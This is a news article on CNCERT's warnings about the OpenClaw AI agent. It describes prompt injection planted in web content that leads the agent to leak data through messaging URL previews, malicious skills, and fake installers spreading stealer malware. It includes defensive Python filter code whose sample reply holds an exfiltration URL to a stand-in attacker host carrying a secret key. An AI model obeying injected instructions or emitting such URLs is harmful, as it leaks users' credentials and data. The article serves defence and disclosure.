OpenClaw AI Vulnerabilities Risk Prompt Injection, Data Breach

China’s National Computer Network Emergency Response Technical Team (CNCERT) has raised alarms about vulnerabilities associated with OpenClaw, an open-source AI platform. Formerly known as Clawdbot and Moltbot, OpenClaw exhibits significant security weaknesses due to its default configurations. The platform grants privileged access essential for its autonomous task execution, making it appealing for exploitation by malicious actors.

Risks Associated with OpenClaw AI

The vulnerabilities primarily stem from prompt injection attacks, in which harmful instructions are embedded in web content that OpenClaw reads, tricking it into leaking sensitive data. Such attacks take several forms, including:

  • Indirect prompt injection (IDPI)
  • Cross-domain prompt injection (XPIA)

Researchers at PromptArmor have demonstrated that URL previews in messaging applications like Telegram and Discord can serve as pathways for data exfiltration. By controlling the URL generated by OpenClaw, attackers can capture sensitive data without users needing to engage directly with malicious links.
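As an added illustration of the URL-preview exfiltration path described above (example code written for this article, not part of OpenClaw or PromptArmor's work): an outbound filter that inspects every URL in an agent's reply before the message reaches a chat client, flagging hosts outside an allowlist and query parameters that carry a known secret or a token-shaped value. The host names, the secret and the sample reply are constructed for the example.

```python
import re
from urllib.parse import urlparse, parse_qsl

# Matches http(s) URLs up to the first whitespace or closing delimiter.
URL_RE = re.compile(r"https?://[^\s<>\"')\]]+")
# A long run of letters and digits with at least one of each: likely a token/key.
TOKEN_RE = re.compile(r"(?=.*[A-Za-z])(?=.*\d)[A-Za-z0-9_\-]{20,}")

# Constructed sample data (hypothetical hosts and secret, not real values).
ALLOWED_HOSTS = {"docs.example.com"}
KNOWN_SECRETS = ("sk_live_ABCDEF1234567890abcdef",)
SAMPLE_REPLY = (
    "Summary saved. Report: https://docs.example.com/report?id=42 "
    "Preview: https://collector.attacker.example/p?d=sk_live_ABCDEF1234567890abcdef "
    "Share: https://docs.example.com/share?token=a1b2c3d4e5f6a7b8c9d0e1f2"
)


def flag_urls(text, allowed_hosts, known_secrets=()):
    """Return (url, reason) pairs for links that must not leave the agent.

    A chat client will fetch a preview of any URL in the message, so a URL
    pointing at an attacker host, or carrying a secret in its query string,
    exfiltrates data even if the user never clicks it.
    """
    findings = []
    for url in URL_RE.findall(text):
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if host not in allowed_hosts:
            findings.append((url, f"host not allowlisted: {host}"))
            continue
        for key, value in parse_qsl(parsed.query, keep_blank_values=True):
            if any(s and s in value for s in known_secrets):
                findings.append((url, f"query param '{key}' carries a known secret"))
                break
            if TOKEN_RE.fullmatch(value):
                findings.append((url, f"query param '{key}' looks like an opaque token"))
                break
    return findings


def sanitize(text, allowed_hosts, known_secrets=()):
    """Replace every flagged URL so the chat client has nothing to preview."""
    for url, _reason in flag_urls(text, allowed_hosts, known_secrets):
        text = text.replace(url, "[link removed by outbound filter]")
    return text


if __name__ == "__main__":
    for url, reason in flag_urls(SAMPLE_REPLY, ALLOWED_HOSTS, KNOWN_SECRETS):
        print(f"BLOCKED {url}: {reason}")
    print(sanitize(SAMPLE_REPLY, ALLOWED_HOSTS, KNOWN_SECRETS))
```

Running the filter at the boundary between the agent and the messaging integration, rather than inside the model prompt, means an injected instruction cannot talk the agent out of it.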

Additional Security Concerns

Beyond prompt injection threats, CNCERT identifies several other critical risks associated with OpenClaw:

  • Irreversible deletion of essential information when the agent misinterprets user instructions.
  • Malicious skill uploads to repositories that can execute arbitrary commands or install malware.
  • Exploitation of known security vulnerabilities that could lead to data breaches.

In sectors critical to national security and economy, such as finance and energy, these breaches could compromise vital business intelligence and operational capabilities.

Recommendations for Enhanced Security

To address these vulnerabilities, users and organizations are urged to implement several security measures:

  • Strengthen network controls to enhance overall security.
  • Avoid exposing OpenClaw’s management port to the internet.
  • Isolate the service within a container.
  • Ensure that credentials are stored securely and not in plaintext.
  • Download skills exclusively from trusted sources.
  • Disable automatic updates for skills to prevent unauthorized changes.
  • Regularly update the AI agent to mitigate known threats.

Government Actions and Malware Campaigns

In response to the escalating security risks, Chinese authorities have moved to prevent state-run enterprises and government agencies from utilizing OpenClaw. This ban also applies to military personnel’s families.

The popularity of OpenClaw has attracted malicious actors who exploit this trend to distribute harmful software disguised as legitimate OpenClaw installers. Reports indicate these malicious repositories, often hosted on GitHub, deliver information-stealing malware like Atomic and Vidar Stealer, along with a proxy tool known as GhostSocks.

As users seek to install OpenClaw, these repositories have surfaced as top search results, increasing the likelihood of attacks. Vigilance and robust security practices are essential to safeguard against these evolving threats.